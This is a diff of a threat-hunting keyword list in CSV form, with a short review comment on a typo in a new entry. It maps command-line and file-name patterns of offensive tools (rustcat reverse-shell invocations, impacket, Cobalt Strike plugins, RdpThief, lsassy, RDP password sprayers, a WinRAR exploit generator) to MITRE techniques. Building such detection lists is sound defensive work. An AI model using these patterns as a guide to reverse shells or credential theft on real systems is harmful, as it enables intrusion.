 "*rarce *.pdf *.rar*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z"
 "*rarce *.rar*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z"
 "*rarce-1.0.0.tar.gz*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","1","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z"
@@ -15565,19 +15735,28 @@ "*ratchatpt-main*","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","N/A","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*ratchatpt-main*","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*raw*/straight-shooter.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" -"*raw_keylogger.tar.gz*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1056-001 - T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213","TA0006 - TA0009","N/A","N/A","Collection - Credential Access - Exfiltration","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","N/A","2","126","37","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z" -"*rawrelayserver.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*rawSHA1_linkedIn_fmt_plug*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*raw_keylogger.tar.gz*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1056-001 - T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213","TA0006 - TA0009","N/A","N/A","Collection - Credential Access - Exfiltration","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","N/A","2","127","38","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z" +"*rawrelayserver.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*rawSHA1_linkedIn_fmt_plug*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*rbcd.py -delegate-from * -delegate-to * -dc-ip * -action write *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*rbcd.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*RBCD_Petitpotam_VulnerableServers.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*rbsec/dnscan*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","N/A","6","10","984","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*rbcd.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*RBCD_Petitpotam_VulnerableServers.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*rbsec/dnscan*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" "*rc4.py *.bin*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" +"*rcan listen -ib *","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*rcat c -s bash *","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 
- T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*rcat connect -s bash*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*rcat listen 55660*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*rcat listen -ie *","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*rcat listen -l *","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*rcat-v3.*darwin-aarch64*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*rcat-v3.*-darwin-x86_64*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - 
TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*rcat-v3.*-linux-x86_64*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" "*RCE-exploits*","offensive_tool_keyword","POC","poc rce - The exploit samples database is a repository for RCE (remote code execution) exploits and Proof-of-Concepts for WINDOWS. the samples are uploaded for education purposes for red and blue teams.","T1059.001 - T1210.001 - T1212 - T1055.012","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/smgorelik/Windows-RCE-exploits","1","1","N/A","N/A","8","731","187","2019-07-29T23:28:15Z","2018-02-13T11:23:40Z" -"*RDE1-main.zip*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","1","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*RDE1-main.zip*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","1","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*rdi_net_user.cpp*","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","410","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z" -"*rdp_check.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*rdp_doublepulsar_rce.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*rdp_check.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*rdp_doublepulsar_rce.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. 
identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*RDPassSpray.*.log*","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","10","6","588","376","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" "*RDPassSpray.csv*","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","10","6","588","376","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" "*RDPassSpray.py*","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","10","6","588","376","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" 
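Review bot: The first added rustcat row uses the keyword `*rcan listen -ib *`, which looks like a typo for `rcat`: every other added row for this tool starts with `rcat`, so as written this pattern would presumably never match the tool's command line and that invocation goes undetected; it should read `"*rcat listen -ib *"`. The added `*rcat listen 55660*` row pins one literal port, so it only fires on that exact port, whereas the sibling rows `*rcat listen -l *` and `*rcat listen -ie *` key on flags; a short note in the `metadata_comment` column (currently `N/A`) saying where that port value comes from would help whoever tunes the rule later. The `*rcat-v3.*darwin-aarch64*` pattern drops the hyphen that the `-darwin-x86_64` and `-linux-x86_64` rows carry; it still matches through the wildcard, but `*rcat-v3.*-darwin-aarch64*` would keep the three release-asset rows consistent.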
@@ -15600,59 +15779,59 @@
 "*RDPSpray*","offensive_tool_keyword","RDPSpray","Tool for password spraying RDP","T1110.001 - T1555.002","TA0006 - TA0040 - TA0003","N/A","N/A","Credential Access","https://github.com/dafthack/RDPSpray","1","1","N/A","N/A","1","89","40","2018-10-12T18:32:51Z","2018-10-12T18:29:52Z"
 "*RdpThief*","offensive_tool_keyword","RdpThief","RdpThief by itself is a standalone DLL that when injected in the mstsc.exe process. will perform API hooking. extract the clear-text credentials and save them to a file. An aggressor script accompanies it. which is responsible for managing the state. monitoring for new processes and injecting the shellcode in mstsc.exe. The DLL has been converted to shellcode using the sRDI project (https://github.com/monoxgas/sRDI). When enabled. RdpThief will get the process list every 5 seconds. search for mstsc.exe. and inject to it","T1055 - T1547 - T1059 - T1078","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","1","N/A","N/A","10","1014","503","2019-11-13T14:13:52Z","2019-11-03T17:54:38Z"
 "*RdpThief.*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - 
Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" -"*rdrleakdiag.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" +"*rdrleakdiag.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" "*read_cs_teamserver*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang 
Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "*readShellcode*","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","1","N/A","10","10","875","158","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" "*ReadyToPhish.xls*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. 
Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*RealBey/ThisIsNotRat*","offensive_tool_keyword","ThisIsNotRat","control windows computeur from telegram","T1098 - T1079 - T1105 - T1047 - T1059","TA0010 - TA0009 - TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RealBey/ThisIsNotRat","1","1","N/A","9","10","49","18","2023-09-10T07:39:38Z","2023-09-07T14:07:32Z" "*realgam3*","offensive_tool_keyword","Github Username","github user Security Researcher @F5Networks hosting reverse tools and other pentester tools for data exfiltration and password attacks","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/realgam3","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Real-Passwords*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1614","2021-12-21T18:14:59Z","2017-04-16T17:08:27Z" -"*Reaper.exe kp *","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. 
This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","61","18","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" -"*Reaper.exe sp *","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","61","18","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" -"*Reaper-main.zip*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","1","61","18","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*Real-Passwords*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" +"*Reaper.exe kp *","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. 
This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*Reaper.exe sp *","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*Reaper-main.zip*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. 
